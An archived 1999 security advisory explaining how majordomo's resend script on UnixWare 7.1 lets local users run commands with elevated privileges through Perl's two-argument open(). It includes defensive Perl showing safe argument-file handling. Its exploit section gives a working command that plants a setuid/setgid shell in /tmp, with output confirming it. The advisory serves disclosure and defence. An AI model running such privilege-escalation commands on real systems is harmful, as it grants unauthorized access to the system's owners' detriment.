majordomo local exploit

From: Brock Tellier (btellierat_private)
Date: Tue Dec 28 1999 - 18:47:44 PST


    OVERVIEW
    A vulnerability in majordomo allows local users to gain elevated
    privileges.
    
    BACKGROUND
    I've only tested the version of majordomo which comes with UnixWare
    7.1, which is 1.94.4.  This vulnerability may or may not still be present
    in newer versions of majordomo, but it exists on the default UW7.1
    installation.
    
    Thanks to rain.forest.puppy for his paper on how to exploit CGI/perl
    scripts, as it helped me out in this exploit.  Grab it at
    http://www.wiretrip.net/rfp/p/doc.asp?id=6&iface=2
    
    DETAILS
    The majordomo wrapper allows users to run programs in the
    /usr/local/majordomo directory with the uid of owner and the gid of
    daemon.  The permissions for wrapper are:
    
    -rwsr-xr-x    1 root     daemon         6464 Jan  4  1999
    /usr/local/majordomo/wrapper
    
    but wrapper immediately setuid()'s and setgid()'s to owner:daemon before
    execing the wrapped program.
    
    A vulnerability in "/usr/local/majordomo/resend" will allow us to execute
    arbitrary commands with our elevated privileges.  The following code
    snippet appears in resend, a perl script:
    
    -snip-
    
    # If the first argument is "@filename", read the real arguments
    # from "filename", and shove them onto the ARGV for later processing
    # by &Getopts()
    #
    if ($ARGV[0] =~ /^\@/) {
        $fn = shift(@ARGV);
        $fn =~ s/^@//;
        open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");
    
    -snip-
    
    As you can see, if our first argument to resend starts with a "@",
    resend will attempt to open() the rest of it as a filename.  However,
    in Perl's two-argument form, open() will also run a program if the
    filename it is given begins with a pipe "|".  If our first argument
    is "@|id", resend will run the program "id" with full privileges.
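    
    As an added illustration (not part of the advisory or of majordomo), the
    following Perl shows how two-argument open() interprets a caller-supplied
    string, next to a hardened way of reading the argument file; the function
    names and the sample inputs are constructed for this example.

```perl
#!/usr/bin/perl
# Added example (not from the advisory or majordomo): why resend's
# two-argument open(AV, $fn) is dangerous, and a safe replacement.
use strict;
use warnings;
use File::Temp qw(tempfile);

# Report how Perl's two-argument open(FH, $fn) would treat $fn. The two-arg
# form parses mode characters out of the string itself, so a caller-controlled
# name can turn an intended read into a write or into running a command.
sub two_arg_open_mode {
    my ($fn) = @_;
    return 'pipe to command (runs it)'   if $fn =~ /^\s*\|/;    # "|cmd"
    return 'pipe from command (runs it)' if $fn =~ /\|\s*$/;    # "cmd|"
    return 'write/append'                if $fn =~ /^\s*>/;     # ">f", ">>f"
    return 'read (stdin)'                if $fn =~ /^\s*-\s*$/; # "-"
    return 'read';                                              # "<f" or bare name
}

# Hardened replacement (hypothetical name) for resend's open(AV, $fn): the
# explicit '<' mode of three-argument open() means $fn is only ever a file
# name, never a command or a mode. The allow-list pattern is defence in depth.
sub read_argument_file {
    my ($fn) = @_;
    die "rejecting argument file name '$fn'\n"
        unless $fn =~ m{^[\w./-]+$} && $fn !~ m{(^|/)\.\.(/|$)};
    open(my $av, '<', $fn) or die "open(\"$fn\"): $!\n";
    chomp(my @args = <$av>);
    close($av);
    return @args;
}

# Constructed inputs: a legitimate argument file, then strings that abuse the
# two-arg parser. Nothing is executed here; only the classification is shown.
my ($fh, $tmp) = tempfile();
print $fh "-l\ntestlist\n";
close($fh);
for my $fn ($tmp, '|id', 'id|', '>/tmp/out') {
    printf "%-20s -> %s\n", $fn, two_arg_open_mode($fn);
}
for my $fn ('|id', $tmp) {
    my @args = eval { read_argument_file($fn) };
    print $@ ? "refused: $@" : "read " . scalar(@args) . " argument(s) from $fn\n";
}
```

    Running resend under taint mode (perl -T) is a further mitigation: it
    refuses to open a pipe or a file for writing with a tainted $fn.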
    
    EXPLOIT
    
    Our exploit is simple:
    
    bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec'
    resend: must specify '-l list' at /usr/local/majordomo/resend line 77.
    
    bash-2.02$ ls -la /tmp/xnec
    -r-sr-sr-x    1 owner    daemon       361688 Dec 29 06:26 /tmp/xnec
    
    Brock Tellier
    UNIX Systems Administrator
    Chicago, IL, USA
    btellierat_private
    
    
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:24:01 PDT